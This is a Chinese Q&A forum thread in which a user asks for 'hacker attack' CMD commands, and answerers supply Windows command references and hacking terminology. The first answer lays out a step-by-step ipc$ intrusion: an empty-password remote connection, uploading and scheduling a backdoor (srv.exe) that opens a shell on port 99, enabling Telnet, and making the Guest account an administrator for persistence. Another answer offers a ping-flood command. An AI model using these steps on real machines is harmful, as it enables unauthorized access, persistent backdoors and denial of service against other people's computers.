跪求cmd黑客攻击指令和cmd电脑命令！悬赏大大滴有

Posted 2023-04-15

一 相关命令
建立空连接:
net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)
建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)
映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推)
如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$
删除一个ipc$连接
net use \\IP\ipc$ /del
删除共享映射
net use c: /del 删除映射的c盘，其他盘类推
net use * /del 删除全部,会有提示要求按y确认
提示:对于不熟悉命令行操作的朋友来说.建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射网络驱动器,效果一样.
二 经典入侵模式
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。
2. C:\>copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。
3. C:\>net time \\127.0.0.1
查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）
5. C:\>net time \\127.0.0.1
再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。
8. C:\WINNT\system32>ntlm
输入ntlm启动（这里的C:\WINNT\system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！
9.Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes
将对方的Guest用户激活
11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机).
ipc$经典入侵步骤：
1、net use \\ip\ipc$ 密码 /user:用户名
2、copy 文件名 \\ip\c$
3、net time \\ip
4、at \\ip 时间 命令
5、入侵成功，连接你的肉鸡
常用的网络命令
net user 查看用户列表
net user 用户名 密码 /add 添加用户
net user 用户名 密码 更改用户密码
net localgroup administrators 用户名 /add 添加用户到管理组
net user 用户名 /delete 删除用户
net user 用户名 查看用户的基本情况
net user 用户名 /active:no 禁用该用户
net user 用户名 /active:yes 启用该用户
net share 查看计算机IPC$共享资源
net share 共享名 查看该共享的情况
net share 共享名=路径 设置共享。例如 net share c$=c:
net share 共享名 /delete 删除IPC$共享
net stop lanmanserver 关闭ipc$和默认共享依赖的服务
net use 查看IPC$连接情况
net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接
net use \\ip\ipc$ /del 删除一个连接
net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘
net use z: /del
net time \\ip 查看远程计算机上的时间
copy 路径:\文件名 \\ip\共享名复制文件到已经ipc$连接的计算机上
net view ip 查看计算机上的共享资源
at 查看自己计算机上的计划作业
at \\ip 查看远程计算机上的计划作业
at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业
at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业
at \\ip all /delete 删除远程计算机上的全部计划作业
at \\ip time "echo 5 > c:\t.txt" 在远程计算机上建立文本文件t.txt；

下面纯手打，上面是度娘给的

taskkill /im 进程名 停止运行
tasklisy 查看运行进程
ipconfig 查看本机IP
md 创建文件夹
rd 删除文件夹
echo off > .txt|exit 添加文本
echo 内容 >> .txt 给文本添加内容
copy 复制文件
net user 用户名 密码/add 创建一个普通账号
net localgroup administrators 用户名 /add 把账户加入超级用户组追问

好麻烦……

看不懂

追答

额。。。

那你先去把基础学了吧

参考技术A Dos命令：需要手工在命令行状态下输入的网络命令。是一种面向磁盘的操作命令，主要包括目录操作类命令、磁盘操作类命令、文件操作类命令和其它命令。
https://baike.baidu.com/item/DOS%E5%91%BD%E4%BB%A4/5143255?fr=aladdin
一：
黑客：
1）要有英语基础，：这是基础，每天要注意修炼。
2）知道常用的黑客术语，
3.）网络安全术语，如tcp/ip协议，APR协议
4.）熟练掌握DOS命令和黑客工具，ping，netstat，net命令等，工具有远程入侵，
5.）主流的编程语言以及脚本。
（1.网页脚本,即网页代码，例如html,CSS,javascript，asp，php，xml等
（2.解释型语言，即perl，python，REBOL，Ruby等，也称为脚本语言，用于和底层的操作系统沟通，效果是效率差，源代码外露，一般用于网页服务器中，不用来开发
软件产品。
（3.混合型语言，Java和c#，处于解释型和编译型之间。
（4.编译型语言，Java，c/c++。
(5.汇编语言，即最接近于硬件的语言，但是用这个语言的人少。
程序语言学习的顺序建议如下：
Javascrip->解释型语言->混和型语言->编译型语言->汇编语言。
书上这样给的。但是根据我们学习的安排进程，应该是
c语言->c++->网页脚本语言->解释型语言->混合型语言->编译型语言->汇编语言
肉鸡：任黑客宰割的计算机。
木马：表面上伪装成正常的程序，一旦运行，入侵者就会获取系统的整个控制权限。
网页木马：表面上伪装成普通的网页文件，或者将正常的网页文件插进去恶意代码，一旦访问这些网络文件，网页木马就会利用对方的系统或者浏览器存在的漏洞自动将木马的服务器端配置好然后下载到访问者的计算机上自动执行。
挂马：这个是在别人的网站文件里放网页木马，或者将代码潜入到对方的正常网页文件里，使得浏览器中马。
后门：当黑客控制了目标主机后，还可以在对方系统植入特定程序，或者修改某些设置。并且这些变化是从表面上很难被察觉。黑客可以使用相应的程序或者方法与该计算机建立连接，重新控制这台计算机。所谓后门便是小偷配置了主人家的钥匙。随时随地就可以进出主人房间不被发现。
IPC$
共享“命名管道”资源，即为了让进程之间通信而开放的命名管道，可以通过验证用户名和密码获着相应权限，在远程管理计算机和查看计算机的共享资源时使用。，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。 IPC$ 是 NT/2000 的一项新功能，它有一个特点，即在同一时间内，两个 IP 之间只允许建立一个连接。 NT/2000 在提供了 ipc$ 功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑共享 (c$,d$,e$ …… ) 和系统目录 winnt 或 windows(admin$) 共享。所有的这些，微软的初衷都是为了方便管理员的管理，但在有意无意中，导致了系统安全性的降低。
不过要注意一点：建立 IPC$ 连接的操作会在 Event Log 中留下记录，不管你是否登录成功
https://baike.baidu.com/item/%E7%A9%BA%E8%BF%9E%E6%8E%A5/1993355?fr=aladdin&fromid=9482475&fromtitle=ipc%24
shell 命令执行环境。
webshell
是以ASP,PHP,JSP或者CGI等网页文件形式存在的一种命令执行环境，即一种网页后门。
“web”的含义是显然需要服务器开放web服务，“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现，也有人称之为网站的后门工具。
溢出：大致分为两种，1.堆溢出2.栈溢出。
溢出即是缓冲区溢出，即程序对接收的输入数据没有执行有效的检测而导致错误。后是程序崩溃，或者执行攻击者的任务。
缓冲区溢出漏洞主要是由于许多软件没有对缓冲区进行检查而造成。
具体溢出就看看下面链接吧。
https://baike.baidu.com/item/%E6%BA%A2%E5%87%BA/1775951?fr=aladdin
1.ip：互联网中，利用IP地址，可以找到目标主机。想要攻击某互联网主机，就先确定目标主机的域名或者IP地址。
IP即是主机编址方式，每个IP地址长32bit，每一个bit是4个字节。IP的表示方法是'点分十进制表示法'
ip信息包括 IP地址，子网掩码，默认网关和DNS。此4个只有协同合作，用户便可以访问互联网并被互联网中的计算机所访问（采用静态IP地址接入互联网时，ISP（服务商）为用户提供全部的IP信息）。
企业网络使用的IP地址，由提供互联网的服务商ISP分配。
私有的IP地址则由网络管理员自由分配。但是是网络内部所有计算机的IP地址不能相同，否则。发生IP地址冲突，导致网络连接失败。
子网掩码是与IP地址相结合的使用的一种技术，作用有两种，1.确定地址的网络号和主机号。2.用于将一个大的IP网络划分为若干个小子网络。
默认网关：是指一台主机找到可用的网关，就把数据包发送给默认指定的网关。由一个网关向另一个网关发送信息时，也必须经过一道关口，这道关口就是网关。
DNS：DNS服务用于将用户的域名请求转换为IP地址。若企业网络没有提供DNS服务，则DNS服务器的IP地址应是ISP的DNS服务器。如果企业网络自己提供的dns服务，则dns服务器的IP地址就是内部DNS服务器的IP地址.
IP 地址的分类
互联网中的每个接口都有唯一的IP地址与其对应，该地址也是有一定结构。以下是IP的https://baike.baidu.com/item/IP%E5%9C%B0%E5%9D%80/150859
A类的IP地址由一个字节的网络地址和3个字节的主机地址组成。网络地址的最高位必须是0，可用A类网络有126个，每个网络能容纳1亿多个主机地址范围1.0.0.1~126.255.255.254.
B类IP地址：2个字节的网络地址和两个字节的主机地址组成，网络地址的最高位必须是10，可用的网络有16382个，每个网络能容纳6万多个主机，地址范围有128.0.0.1~191.255.255.254.
C类的IP地址：由3个字节的网络地址和1个字节的主机地址。组成网络地址最高位是110，可用的网络达209万，每个网络能容纳254个主机，地址范围是192.0.0.1~223.255.255.254
D类的地址
用于多点广播，第一个字节以1110开始，它是一个专门保留的地址，并不指向特定的网络。多点广播地址用来一次寻址一组计算机，他标识共享同一协议的一组计算机，地址范围为224.0.0.1~239.255.255.254
E类的IP地址
以11110开始，为了将来使用而保留。
全零（0.0.0.0）地址对应于当前主机；全1的IP地址（255.255.255.255）是当前子网的广播地址，地址范围为240.0.0.1~255.255.255.254
注意 全零和全1的地址禁止使用，全零代表本网络，而全一是广播地址（在CISCO上可以使用全零地址）常用的是ABC这三类地址。
2.认识进程
所谓进程便是程序在计算机上的一次执行活动。开始运行一个程序时，就启动一个进程。进程还分为系统进程和用户进程。
凡是用于完成操作系统的各种功能的进程就是系统进程，且时处于运动状态下的操作系统本身；
用户进程就是所有用户启动的进程。进程是操作系统进行资源分配的单位。
3.端口
是计算机和外界通信交流的出口。
硬件领域的端口又称为接口，如USB端口，串行端口等。
软件领域端口一般指互联网中面向连接服务和无连接服务的通信协议端口，是一种抽象的软件结构，包括一些数据结构和i/o（基本输入输出）缓冲区。
端口是传输层的内容，是面向连接的，对应网络上常见的一些服务，这些常见的服务可以划分为TCP端口（面向连接，如打电话）和使用UDP端口（无连接，如写信）两种。
4.虚拟机环境
黑客无论是在测试和学习黑客工具的操作方法还是在攻击时候，不会拿实体计算机来尝试，而是在计算机中搭建虚拟环境，即在自己已在的系统中，利用虚拟机创建一个内在的系统，该系统可以与外界独立，但与已经存在的系统建立网络关系，从而方便使用某些黑客工具进行攻击模拟，并且一旦黑客工具对虚拟机造成破坏，也会很快就会恢复，不会影响本来的计算机系统，使得操作更安全。
二：
1.window系统的命令行
服务器管理 和网络管理是系统和网络管理者的主要内容。
window系统本身 就带着一些病毒和受残损的文件，常使用户无法正常工作。但是熟练掌握命令行的使用方法，能保障计算机系统的安全性能。
2.Dos系统
dos是一组控制计算机 工作的程序，专门用来管理计算机中各种软件，硬件资源，负责监视和 控制计算机的全部工作过程。向用户提供了一整套使用 计算机系统的 命令和方法，还向用户提供了一套组织和应用磁盘上信息的方法。
dos的 功能：
执行命令和程序:当用户键入合法命令和文件名后，dos就根据文件的存储地址到内存 或外存上查找用户所需的程序，并根据用户的 要求使得CPU运行，否则则出现出错信息 ，告诉用户服务，在这里，cpu承担了使用者，计算机，应用程序三者之间的中间人。
内存管理：
分配内存空间，保护内存，使得任何一个程序所占的空间不遭到破坏，同硬件相配合，可以设置一个最佳的操作环境。
设备管理：
为用户提供使用各种输入或输出的设备（如键盘，磁盘，打印机，和显示器等）的操作方法。可以通过dos方便的实现内存和外存之间的数据传送和存取。
文件管理;
为用户提供一种简单的存取和管理信息方法。通过dos管理文件目录，为文件分配磁盘存储空间，建立，复制，删除，读/写和检索各类文件等。
作业管理：
作业是指用户提交给计算机系统的一个独立的计算任务，包括源程序，数据和相关命令。作业管理是对用户提交的诸多作业进行管理，包括作业的组织，控制和 调度等。
文件与目录：
文件是存储于外存储器中具有名字的一组相关信息集合，
在dos下的所有程序和数据都是以文件形式存入磁盘。自己编制的存入磁盘的程序就是文件。执行dos 外部的命令就调用此命令文件的过程。
内部命令隐藏在dos的io.sys和msdos.sys中，当dos启动计算机时候
使用者输入一个dos 命令时候，该指令先交由command.com分析，所以command被称为命令处理器，其功能就是判断使用者 所输入的指令是内部命令还是外部命令。若是内部，交给io.sys或msdos.sys处理，反之则到磁盘上找寻该档案，即执行该指令。
WiFi
WiFi实际上是一种高频无线电信号，它是 一种可将个人计算机。手机等终端以无线方式互相连接的技术。
无线网络在无线局域网上的范畴内是指“无线相容性认证".实质上是一种商业认证。也是无线联网技术。
以前通过网线连接计算机，而无线保真则是通过无线电波来联网。常见的就是用一个无线路由器，在这个无线路由器的电波覆盖的有效范围内就可以采用无线保真方式进行联网，若无线路由器连接了一条ADSL的线路或者别的上网线路，
电脑的无线路由器的参数设置。192.168.1.1
连接问题：手机连不上路由器，可能是手机连接该无线路由器的无线信号，并且在手机上保存了无线网络的配置文件，但是改变了无线路由器的加密方式或者密钥。手机不能自动连接到该信号，需要先删除原有的无线配置文件再重新连接。
若是手机无线显示已连接，但是不能上网，可能是手机的IP地址等参数配置错误。推荐使用默认的自动获取默认的IP地址。

作者：笑雅雅
链接：https://www.jianshu.com/p/e51947fe4241
来源：简书
著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。 参考技术B 最简单的 ping ip -t -l 65500

CMD指令详解

CMD各项指令详解

以下是cmd的命令参数详解：<P>CMD [/A │ /U] [/Q] [/D] [/E:ON │ /E:OFF] [/F:ON │ /F:OFF]
[/V:ON │ /V:OFF] [/S] [/C │ /K] string] <P>/C 执行字符串指定的命令然后终断
/K 执行字符串指定的命令但保留
/S 在 /C 或 /K 后修改字符串处理(见下)
/Q 关闭回应
/D 从注册表中停用执行 AutoRun 命令(见下)
/A 使向内部管道或文件命令的输出成为 ANSI
/U 使向内部管道或文件命令的输出成为 Unicode
/T:fg 设置前景/背景颜色(详细信息，请见 COLOR /?)
/E:ON 启用命令扩展(见下)
/E:OFF 停用命令扩展(见下)
/F:ON 启用文件和目录名称完成字符 (见下)
/F:OFF 停用文件和目录名称完成字符(见下)
/V:ON 将 ! 作为定界符启动延缓环境变量扩展。如: /V:ON 会允许 !var! 在执行时允许 !var! 扩展变量 var。var 语法在输入时扩展变量，这与在一个 FOR 循环内不同。
/V:OFF 停用延缓的环境扩展。 <P>请注意，如果字符串有引号，可以接受用命令分隔符 \'\'&&\'\' 隔开
的多个命令。并且，由于兼容原因，/X 与 /E:ON 相同，/Y 与 /E:OFF 相同，并且 /R 与 /C 相同。忽略任何其他命令行开关。
如果指定了 /C 或 /K，命令行开关后的命令行其余部分将作为命令行处理；在这种情况下，会使用下列逻辑处理引号字符("): <P>1. 如果符合下列所有条件，那么在命令行上的引号字符将被保留:
- 不带 /S 命令行开关
- 整整两个引号字符
- 在两个引号字符之间没有特殊字符，特殊字符为下列中的一个: <>()@^│
- 在两个引号字符之间有至少一个空白字符
- 在两个引号字符之间有至少一个可执行文件的名称。 <P>2. 否则，老办法是，看第一个字符是否是一个引号字符，如果是，舍去开头的字符并删除命令行上 的最后一个引号字符，保留最后一个引号字符之后的文字。
如果 /D 未在命令行上被指定，当 CMD.EXE 开始时，它会寻找以下 REG_SZ/REG_EXPAND_SZ 注册表变量。如果其中一个或两个都存在，这两个变量会先被执行。
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor\\AutoRun
和/或
HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\AutoRun
命令扩展是按默认值启用的。您也可以使用 /E:OFF，为某一特定调用而停用扩展。您可以在机器上和/或用户登录会话上启用或停用CMD.EXE 所有调用的扩展，这要通过设置使用REGEDT32.EXE 的注册表中的一个或两个 REG_DWORD 值:
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor\\EnableExtensions
和/或
HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\EnableExtensions
到 0x1 或 0x0。用户特定设置比机器设置有优先权。命令行开关比注册表设置有优先权。 <P>命令行扩展包括对下列命令所做的更改和/或添加:
DEL 或 ERASE
COLOR
CD 或 CHDIR
MD 或 MKDIR
PROMPT
PUSHD
POPD
SET
SETLOCAL
ENDLOCAL
IF
FOR
CALL
SHIFT
GOTO
START (同时包括对外部命令调用所做的更改)
ASSOC
FTYPE <P>延迟变量环境扩展不按默认值启用。您可以用/V:ON 或 /V:OFF命令行开关，为 CMD.EXE 的某个调用而启用或停用延迟环境变量扩充。
您可以在机器上和/或用户登录会话上启用或停用 CMD.EXE 所有调用的完成，这要通过设置使用 REGEDT32.EXE 的注册表中的一个或两个 REG_DWORD 值:
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor\\DelayedExpansion
和/或
HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DelayedExpansion
到 0x1 或 0x0。用户特定设置比机器设置有优先权。命令行开关比注册表设置有优先权。
如果延迟环境变量扩充被启用，惊叹号字符可在执行时间，被用来代替一个环境变量的数值。
文件和目录名完成不按默认值启用。您可以用 /F:ON 或 /F:OFF命令行开关，为 CMD.EXE 的某个调用而启用或停用文件名完成。 您可以在机器上和/或用户登录会话上启用或停用 CMD.EXE 所有调用的完成，这要通过设置使用 REGEDT32.EXE 的注册表中的一个或两个REG_DWORD 值:
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor\\CompletionChar
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor\\PathCompletionChar
和/或
HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\CompletionChar
HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\PathCompletionChar
由一个控制字符的十六进制值作为一个特定参数(例如，0x4 是Ctrl-D，0x6 是 Ctrl-F)。 用户特定设置优先于机器设置。命令行开关优先于注册表设置。
如果完成是用 /F:ON 命令行开关启用的，两个要使用的控制符是:目录名字完成用 Ctrl-D， 文件名完成用 Ctrl-F。 要停用注册表中的某个字符，请用空格(0x20)的数值，因为此字符不是控制字符。
如果键入两个控制字符中的一个，完成会被调用。完成功能将路径字符串带到光标的左边，如果没有通配符，将通配符附加到左边，并建立相符的路径列表。然后，显示第一个相符的路径。如果没有相符的路径，则发出嘟嘟声，不影响显示。之后，重复按同一个控制字符会循环显示相符路径的列表。将 Shift 键跟控制字符同时按下，会倒着显示列表。如果对该行进行了任何编辑，并再次按下控制字符，保存的相符路径的列表会被丢弃，新的会被生成。如果在文件和目录名完成之间切换，会发生同样现象。两个控制字符之间的唯一区别是文件完成字符符合文件和目录名，而目录完成字符只符合目录名。如果文件完成被用于内置式目录命令(CD、MD 或 RD)，就会使用目录完成。将引号将相符路径括起来，完成代码可以正确处理含有空格或其他特殊字符的文件名。同时，如果备份，然后从行内调用文件完成，完成被调用是位于光标右方的文字会被丢弃。 参考技术A 有关某个命令的详细信息，请键入 HELP 命令名

XP.CMD命令大全

有关某个命令的详细信息，请键入 HELP 命令名
ASSOC 显示或修改文件扩展名关联。
AT 计划在计算机上运行的命令和程序。
ATTRIB 显示或更改文件属性。
BREAK 设置或清除扩展式 CTRL+C 检查。
CACLS 显示或修改文件的访问控制列表(ACLs)。
CALL 从另一个批处理程序调用这一个。
CD 显示当前目录的名称或将其更改。
CHCP 显示或设置活动代码页数。
CHDIR 显示当前目录的名称或将其更改。
CHKDSK 检查磁盘并显示状态报告。
CHKNTFS 显示或修改启动时间磁盘检查。
CLS 清除屏幕。
CMD 打开另一个 Windows 命令解释程序窗口。
COLOR 设置默认控制台前景和背景颜色。
COMP 比较两个或两套文件的内容。
COMPACT 显示或更改 NTFS 分区上文件的压缩。
CONVERT 将 FAT 卷转换成 NTFS。您不能转换
当前驱动器。
COPY 将至少一个文件复制到另一个位置。
DATE 显示或设置日期。
DEL 删除至少一个文件。
DIR 显示一个目录中的文件和子目录。
DISKCOMP 比较两个软盘的内容。
DISKCOPY 将一个软盘的内容复制到另一个软盘。
DOSKEY 编辑命令行、调用 Windows 命令并创建宏。
ECHO 显示消息，或将命令回显打开或关上。
ENDLOCAL 结束批文件中环境更改的本地化。
ERASE 删除至少一个文件。
EXIT 退出 CMD.EXE 程序(命令解释程序)。
FC 比较两个或两套文件，并显示
不同处。
FIND 在文件中搜索文字字符串。
FINDSTR 在文件中搜索字符串。
FOR 为一套文件中的每个文件运行一个指定的命令。
FORMAT 格式化磁盘，以便跟 Windows 使用。
FTYPE 显示或修改用于文件扩展名关联的文件类型。
GOTO 将 Windows 命令解释程序指向批处理程序
中某个标明的行。
GRAFTABL 启用 Windows 来以图像模式显示
扩展字符集。
HELP 提供 Windows 命令的帮助信息。
IF 执行批处理程序中的条件性处理。
LABEL 创建、更改或删除磁盘的卷标。
MD 创建目录。
MKDIR 创建目录。
MODE 配置系统设备。
MORE 一次显示一个结果屏幕。
MOVE 将文件从一个目录移到另一个目录。
PATH 显示或设置可执行文件的搜索路径。
PAUSE 暂停批文件的处理并显示消息。
POPD 还原 PUSHD 保存的当前目录的上一个值。
PRINT 打印文本文件。
PROMPT 更改 Windows 命令提示符。
PUSHD 保存当前目录，然后对其进行更改。
RD 删除目录。
RECOVER 从有问题的磁盘恢复可读信息。
REM 记录批文件或 CONFIG.SYS 中的注释。
REN 重命名文件。
RENAME 重命名文件。
REPLACE 替换文件。
RMDIR 删除目录。
SET 显示、设置或删除 Windows 环境变量。
SETLOCAL 开始批文件中环境更改的本地化。
SHIFT 更换批文件中可替换参数的位置。
SORT 对输入进行分类。
START 启动另一个窗口来运行指定的程序或命令。
SUBST 将路径跟一个驱动器号关联。
TIME 显示或设置系统时间。
TITLE 设置 CMD.EXE 会话的窗口标题。
TREE 以图形模式显示驱动器或路径的目录结构。
TYPE 显示文本文件的内容。
VER 显示 Windows 版本。
VERIFY 告诉 Windows 是否验证文件是否已正确
写入磁盘。
VOL 显示磁盘卷标和序列号。
XCOPY 复制文件和目录树。

appwiz.cpl------------添加删除程序

control userpasswords2--------用户帐户设置

cleanmgr-------垃圾整理

CMD--------------命令提示符可以当作是 Windows 的一个附件，Ping，Convert 这些不能在图形环境下 使用的功能要借助它来完成。

cmd------jview察看Java虚拟机版本。

command.com------调用的则是系统内置的 NTVDM，一个 DOS虚拟机。它完全是一个类似 Virtual PC 的 虚拟环境，和系统本身联系不大。当我们在命令提示符下运行 DOS 程序时，实际上也 是自动转移到 NTVDM虚拟机下，和 CMD 本身没什么关系。

calc-----------启动计算器

chkdsk.exe-----Chkdsk磁盘检查

compmgmt.msc---计算机管理

conf-----------启动 netmeeting

control userpasswords2-----User Account 权限设置

devmgmt.msc--- 设备管理器

diskmgmt.msc---磁盘管理实用程序

dfrg.msc-------磁盘碎片整理程序

drwtsn32------ 系统医生

dvdplay--------启动Media Player

dxdiag-----------DirectX Diagnostic Tool

gpedit.msc-------组策略编辑器

gpupdate /target:computer /force 强制刷新组策略

eventvwr.exe-----事件查看器

explorer-------打开资源管理器

logoff---------注销命令

lusrmgr.msc----本机用户和组

msinfo32---------系统信息

msconfig---------系统配置实用程序

net start (servicename)----启动该服务

net stop (servicename)-----停止该服务

notepad--------打开记事本

nusrmgr.cpl-------同control userpasswords，打开用户帐户控制面板

Nslookup-------IP地址侦测器

oobe/msoobe /a----检查XP是否激活

perfmon.msc----计算机性能监测程序

progman--------程序管理器

regedit----------注册表编辑器

regedt32-------注册表编辑器

regsvr32 /u *.dll----停止dll文件运行

route print------查看路由表

rononce -p ----15秒关机

rsop.msc-------组策略结果集

rundll32.exe rundll32.exe %Systemroot%System32shimgvw.dll,ImageView_Fullscreen----启动一个空白的Windows 图片和传真查看器

secpol.msc--------本地安全策略

services.msc---本地服务设置

sfc /scannow-----启动系统文件检查器

sndrec32-------录音机

taskmgr-----任务管理器（适用于2000／xp／2003）

tsshutdn-------60秒倒计时关机命令

winchat--------XP自带局域网聊天

winmsd---------系统信息

winver-----显示About Windows 窗口

wupdmgr-----------Windows Update 参考技术B 看这里http://xueshen.net/wp-content/uploads/2009/03/cmd.htm